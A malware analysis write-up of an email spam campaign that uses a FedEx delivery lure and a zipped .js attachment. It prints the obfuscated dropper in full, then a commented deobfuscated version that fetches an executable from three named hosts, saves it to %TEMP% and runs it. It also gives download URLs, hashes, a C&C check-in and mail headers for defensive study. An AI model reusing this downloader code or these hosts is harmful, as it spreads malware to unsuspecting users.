Javascript infectors arriving via email spam

Recently we have been receiving multiple spam messages with ZIP attachments that contain .js files. The lure tries to trick the user into opening the JavaScript file; once it is run by Windows Script Host it downloads and executes further malware (Trojans).

1

This is the contents of 00242116.doc.js from the zip file (note the double extension: Windows Script Host runs it as a .js script, the “.doc” part only makes it look like a document):

// Obfuscated dropper exactly as received (00242116.doc.js). The real code is
// split into 233 string fragments returned by squ1()..squ233(); the function
// definitions are listed in shuffled order, but the loop at the very end calls
// them by index 1..233 through the script's global object (`this`),
// concatenates the fragments into jg, and hands the result to eval via
// this[zo()+squ()], i.e. this['e'+'val']. `stroke` is the hex id that the
// reconstructed code sends to the download servers. To read the script by
// hand, sort the fragments by their number; the deobfuscated form is given
// further down in the write-up.
var stroke="5556515E0D0A020B240F08010D17170A01164A0B1603";function squ61() { return 'gs'; };  function squ214() { return '; } c'; };  function squ58() { return 'iro'; };  function squ142() { return 'e = '; };  function squ125() { return ' v'; };  function squ27() { return '; '; };  function squ144() { return '.writ'; };  function squ222() { return ' 1) b'; };  function squ156() { return '5000)'; };  function squ178() { return '1,0'; };  function squ223() { return 'reak;'; };  function squ197() { return '://"+'; };  function squ91() { return 'Acti'; };  function squ150() { return 'Body'; };  function squ113() { return 'ea'; };  function squ203() { return 'hp?r'; };  function squ202() { return 'nt.p'; };  function squ82() { return 'xe";'; };  function squ137() { return 'xa.'; };  function squ190() { return 'try '; };  function squ103() { return 'ystat'; };  function squ217() { return '(er)'; };  function squ184() { return '; }; '; };  function squ51() { return '; va'; };  function squ130() { return 'veXO'; };  function squ88() { return 'r x'; };  function squ81() { return '".e'; };  function squ155() { return ' > '; };  function squ224() { return ' } '; };  function squ36() { return 'i++)'; };  function squ182() { return ' (er'; };  function squ229() { return '; d'; };  function squ112() { return '(xo.r'; };  function squ67() { return 'from'; };  function squ172() { return '; '; };  function squ230() { return 'l(207'; };  function squ54() { return ' ws.E'; };  function squ200() { return '"/d'; };  function squ152() { return ' (xa.'; };  function squ38() { return ' va'; };  function squ117() { return ' == '; };  function squ92() { return 'veX'; };  function squ143() { return '1; xa'; };  function squ7() { return 'ar b'; };  function squ16() { return 'r d'; };  function squ136() { return '; '; };  function squ163() { return 'ti'; };  function squ86() { return ' = 0;'; };  function squ48() { return 't.'; };  function squ204() { return 'nd="+'; };  function squ157() { 
return ' {'; };  function squ90() { return 'new '; };  function squ154() { return 'ze'; };  function squ8() { return ' = "e'; };  function squ160() { return '1; x'; };  function squ141() { return 'typ'; };  function squ186() { return 'clo'; };  function squ107() { return ' = fu'; };  function squ173() { return 'tr'; };  function squ158() { return ' dn '; };  function squ29() { return '(v'; };  function squ168() { return 'sa'; };  function squ22() { return 'br".'; };  function squ179() { return '); '; };  function squ30() { return 'ar i='; };  function squ193() { return '("G'; };  function squ124() { return ') {'; };  function squ171() { return 'fn,2)'; };  function squ176() { return 'Run(f'; };  function squ98() { return 'TTP'; };  function squ12() { return 'es-eg'; };  function squ28() { return 'for '; };  function squ114() { return 'dy'; };  function squ6() { return ' v'; };  function squ165() { return ' = '; };  function squ24() { return 'it'; };  function squ57() { return 'dEnv'; };  function squ195() { return 'ht'; };  function squ105() { return 'an'; };  function squ133() { return 'ODB'; };  function squ159() { return '= '; };  function squ115() { return 'Sta'; };  function squ147() { return 'Resp'; };  function squ50() { return 'l")'; };  function squ78() { return '*1000'; };  function squ89() { return 'o = '; };  function squ167() { return ' xa.'; };  function squ2() { return 'ncti'; };  function squ194() { return 'ET","'; };  function squ212() { return '.sen'; };  function squ188() { return '(); }'; };  function squ201() { return 'ocume'; };  function squ108() { return 'nc'; };  function squ174() { return 'y { w'; };  function squ75() { return 'h.r'; };  function squ132() { return '("AD'; };  function squ192() { return 'open'; };  function squ52() { return 'r f'; };  function squ175() { return 's.'; };  function squ213() { return 'd()'; };  function squ161() { return 'a.'; };  function squ9() { return 'tqy.'; };  function squ37() { return ' {'; };  
function squ153() { return 'si'; };  function squ34() { return 'ngth'; };  function squ83() { return ' v'; };  function squ59() { return 'nment'; };  function squ18() { return 'mon'; };  function squ70() { return 'de(92'; };  function squ220() { return '(dn '; };  function squ65() { return 'St'; };  function squ106() { return 'ge'; };  function squ134() { return '.Stre'; };  function squ146() { return 'xo.'; };  function squ77() { return 'm()'; };  function squ209() { return ' fa'; };  function squ131() { return 'bject'; };  function squ43() { return 'veXOb'; };  function squ23() { return 'spl'; };  function squ93() { return 'Obje'; };  function squ232() { return 'dl(6'; };  function squ198() { return 'b[i'; };  function squ49() { return 'Shel'; };  function squ116() { return 'te'; };  function squ32() { return '<b.'; };  function squ219() { return '; if '; };  function squ40() { return ' ='; };  function squ46() { return '"WSc'; };  function squ109() { return 'tion('; };  function squ191() { return '{ xo.'; };  function squ231() { return '2); '; };  function squ101() { return '.on'; };  function squ145() { return 'e('; };  function squ76() { return 'ando'; };  function squ45() { return 'ct('; };  function squ20() { return 'unes'; };  function squ17() { return 'jra'; };  function squ127() { return 'xa = '; };  function squ79() { return '00'; };  function squ196() { return 'tp'; };  var jg = '';  function squ169() { return 'veToF'; };  function squ227() { return '735'; };  function squ180() { return '} cat'; };  function squ33() { return 'le'; };  function squ42() { return ' Acti'; };  function squ100() { return 'xo'; };  function squ10() { return 'com'; };  function squ85() { return ' dn'; };  function squ99() { return '"); '; };  function squ56() { return 'an'; };  function squ128() { return 'new '; };  function squ39() { return 'r ws'; };  function squ21() { return '.com.'; };  function squ94() { return 'ct("'; };  function squ228() { return '1)'; };  function 
squ187() { return 'se'; };  function squ185() { return 'xa.'; };  function squ14() { return 'ers'; };  function squ11() { return ' l'; };  function squ162() { return 'posi'; };  function squ111() { return '{ if '; };  function squ199() { return ']+'; };  function squ97() { return 'XMLH'; };  function squ221() { return '=='; };  function squ215() { return 'at'; };  function squ205() { return 'fr+"&'; };  function squ73() { return 'und('; };  function squ80() { return '000)+'; };  function squ13() { return 'lanti'; };  function squ69() { return 'rCo'; };  function squ25() { return '(" '; };  function squ44() { return 'je'; };  function squ170() { return 'ile('; };  function squ211() { return ' xo'; };  function squ26() { return '")'; };  function squ126() { return 'ar '; };  function squ3() { return 'on'; };  function squ123() { return '200'; };  function squ207() { return '+st'; };  function squ71() { return ')+Ma'; };  function squ181() { return 'ch'; };  function squ41() { return ' new'; };  function squ66() { return 'ring.'; };  function squ135() { return 'am")'; };  function squ189() { return '; }; '; };  function squ149() { return 'se'; };  function squ60() { return 'Strin'; };  function squ63() { return 'MP%'; };  function squ74() { return 'Mat'; };  function squ122() { return '= '; };  function zo() { return 'e'; };  function squ47() { return 'rip'; };  function squ1() { return 'fu'; };  function squ4() { return ' dl(f'; };  function squ() { return 'val'; };  function squ183() { return ') {}'; };  function squ96() { return 'ML2.'; };  function squ210() { return 'lse);'; };  function squ64() { return '")+'; };  function squ164() { return 'on'; };  function squ84() { return 'ar'; };  function squ110() { return ') '; };  function squ19() { return 'ant'; };  function squ53() { return 'n ='; };  function squ118() { return '4 &&'; };  function squ208() { return 'roke,'; };  function squ206() { return 'id="'; };  function squ129() { return 'Acti'; };  function 
squ95() { return 'MSX'; };  function squ102() { return 'read'; };  function squ5() { return 'r) {'; };  function squ104() { return 'ech'; };  function squ121() { return 's ='; };  function squ120() { return 'statu'; };  function squ216() { return 'ch '; };  function squ68() { return 'Cha'; };  function squ87() { return ' va'; };  function squ233() { return '773);'; };  function squ72() { return 'th.ro'; };  function squ31() { return '0; i'; };  function squ140() { return 'xa.'; };  function squ225() { return '};'; };  function squ55() { return 'xp'; };  function squ15() { return '.f'; };  function squ119() { return ' xo.'; };  function squ218() { return ' {}'; };  function squ138() { return 'ope'; };  function squ151() { return '); if'; };  function squ139() { return 'n(); '; };  function squ177() { return 'n,'; };  function squ166() { return '0;'; };  function squ35() { return '; '; };  function squ226() { return ' dl('; };  function squ148() { return 'on'; };  function squ62() { return '("%TE'; }; for (var pqx=1; pqx<=233; pqx++) { jg += this['squ'+pqx](); } this[zo()+squ()](jg);

Luckily there is Wepawet, which can analyze and simplify obfuscated JavaScript. Here is the deobfuscated script:

// Downloader routine from the deobfuscated script. Walks the hard-coded host
// list, requests http://<host>/document.php?rnd=<fr>&id=<stroke>, and if the
// reply is an HTTP 200 larger than 5000 bytes saves it as
// %TEMP%\<random number>.exe and launches it. Stops after the first host
// that delivers such a payload. Needs Windows Script Host (ActiveXObject).
// fr: value of the "rnd" query parameter; `stroke` is the hex string defined
// at the top of the script (presumably a campaign/affiliate id - not confirmed).
function dl(fr){
  // The three download hosts, tried in this order.
  var b = "etqy.com les-eglantiers.fr djramonantunes.com.br".split(" ");
  for (var i = 0; i < b.length; i ++ ){
    var ws = new ActiveXObject("WScript.Shell");
    // Drop path: %TEMP% + "\" (char 92) + integer in [0, 100000000] + ".exe".
    // A fresh random name is picked for every host attempt.
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(
    Math.random() * 100000000) + ".exe";
    // Set to 1 once a payload has been written to disk; ends the host loop.
    var dn = 0;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    // Response handler; only acts on a completed request with status 200.
    // Because the request below is synchronous, this has already run by the
    // time send() returns.
    xo.onreadystatechange = function (){
      if (xo.readyState == 4 && xo.status == 200){
        // ADODB.Stream in binary mode (type 1 = adTypeBinary) to write raw bytes.
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1;
        xa.write(xo.ResponseBody);
        // Small replies (error pages, empty placeholders) are ignored -
        // presumably so only a real executable is ever saved and run.
        if (xa.size > 5000){
          dn = 1;
          xa.position = 0;
          // 2 = adSaveCreateOverWrite: replace an existing file of that name.
          xa.saveToFile(fn, 2);
          try {
            // Run(command, windowStyle = 1 (normal), waitOnReturn = 0):
            // launches the dropped file without waiting for it to exit.
            ws.Run(fn, 1, 0);
          }
          catch (er){
            // Launch failures are silently ignored.
          }
          ;
        }
        ;
        xa.close();
      }
      ;
    }
    ;
    try {
      // Synchronous GET (async = false). "id" carries the global stroke value;
      // "rnd" carries the caller's argument.
      xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + stroke, false
      );
      xo.send();
    }
    catch (er){
      // Network/DNS errors are swallowed so that the next host is tried.
    }
    ;
    // Stop as soon as one host has delivered a payload.
    if (dn == 1)break ;
  }
}
// Three download attempts with different "rnd" values; each one walks the
// host list inside dl() until a payload has been saved and launched.
(function () {
  var rnds = [7351, 2072, 6773];
  for (var k = 0; k < rnds.length; k++) {
    dl(rnds[k]);
  }
})();

Now that one is pretty easy to read. dl() is called three times; each call walks the three hosts below in order and requests document.php, saves the first reply that is an HTTP 200 larger than 5000 bytes to %TEMP% under a random numeric file name with an .exe extension, executes it via WScript.Shell.Run, and then stops trying further hosts. Smaller replies and connection errors are silently skipped, so up to nine requests may be made and up to three executables dropped.

http://etqy.com/document.php?rnd=7351&id=5556515E0D0A020B240F08010D17170A01164A0B1603
http://les-eglantiers.fr/document.php?rnd=7351&id=5556515E0D0A020B240F08010D17170A01164A0B1603
http://djramonantunes.com.br/document.php?rnd=7351&id=5556515E0D0A020B240F08010D17170A01164A0B1603

With rnd taking the values 7351, 2072 and 6773 on the three dl() calls; the id value is the hard-coded stroke string from the top of the script (note the script sends it under the parameter name “id”, not “stroke”).

During analysis one file was downloaded as “5a3a4bc2.gif” with MD5 E2ADEAA3E593A1783E5051E9935D81B3 SHA1 F9748B33515DA932CA8E6065325C7A22C2508DEB, which is a Windows executable. According to a comment on Malwr by Brad Berkemier this is a ZeuS file.

The check-in to the C&C server (see below), however, begins with the literal marker “CRYPTED0”, which is known from the Pony Downloader malware – so the sample's own traffic points to Pony rather than (or in addition to) ZeuS. Interestingly the bot checks in with a static User-Agent claiming MSIE 5.0 on “Windows 98”, an easy string to alert on in proxy logs.

POST /cgi/open.php?AjDdUMhbDVn4StxDat8vR4WEk55GO4rhJCn HTTP/1.0
Host: poolsociety.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 192
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

CRYPTED0.b..%nv..[.jm....$.v............AG.p.<l?.X5...V6.....y....+.......h*.d....7..+......C..7E..9.*.......O.....s2q.`?,....`.Y.kQ.......m[z..c._Z..g...Y& 3.....O..Q.2.........%`..B.i.(.#.mR

HTTP/1.1 200 OK
Date: Thu, 02 Jul 2015 18:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html

STATUS-IMPORT-OK

Source of the email spam

The full email header to that spam mail:

Return-path: 
Envelope-to: 1690mail1@mail04.in.easyname.com
Delivery-date: Thu, 02 Jul 2015 18:03:48 +0200
Received: from 50.97.79.218-static.reverse.softlayer.com ([50.97.79.218] helo=doit.thinkitbuilditllc.com)
	by mx.easyname.eu with esmtps (TLS1.2:DHE_RSA_AES_256_CBC_SHA256:256)
	(Exim 4.80)
	(envelope-from )
	id 1ZAgxj-0003Tv-8z
	for info@kleissner.org; Thu, 02 Jul 2015 18:03:46 +0200
Received: from nobody by doit.thinkitbuilditllc.com with local (Exim 4.85)
	(envelope-from )
	id 1ZAgxb-0000nG-E6
	for info@kleissner.org; Thu, 02 Jul 2015 18:03:35 +0200
To: info@kleissner.org
Subject: Courier was unable to deliver the parcel, ID00242116
X-PHP-Script: fm.cyberball.1two7.com/post.php for 80.70.5.26
Date: Thu, 2 Jul 2015 18:03:35 +0200
From: "FedEx Standard Overnight" 
Reply-To: "FedEx Standard Overnight" 
Message-ID: 
X-Priority: 3
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="b1_b7c1ceb8ae8d3d20105cf2b9940a7f5b"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - doit.thinkitbuilditllc.com
X-AntiAbuse: Original Domain - kleissner.org
X-AntiAbuse: Originator/Caller UID/GID - [99 500] / [47 12]
X-AntiAbuse: Sender Address Domain - doit.thinkitbuilditllc.com
X-Get-Message-Sender-Via: doit.thinkitbuilditllc.com: uid via acl_c_vhost_owner from authenticated_id: nobody from /only user confirmed/virtual account not confirmed
X-Source: 
X-Source-Args: /usr/local/apache/bin/httpd -k start -DSSL 
X-Source-Dir: 1two7.com:/public_html/cyberball/fm
X-ACL-Warn: X-DNSBL-JUNKEMAILFILTER
X-ACL-Warn: X-DNSBL-BARRACUDACENTRAL

You can clearly see “X-PHP-Script: fm.cyberball.1two7.com/post.php for 80.70.5.26”. PHP's mail() adds this header when mail.add_x_header is enabled (the default on many shared-hosting setups), so it records which script sent the mail and the client address that invoked it. Note that 80.70.5.26 is the HTTP client that hit post.php, which may be a proxy or another compromised machine rather than the spammer's own address. The two X-ACL-Warn lines also show the sending host was already listed on the junkemailfilter and barracudacentral DNSBLs when the mail was received. Directory listing is enabled for that URL, however, it does not reveal much other than the post.php and other, legitimate files.

Directory Listing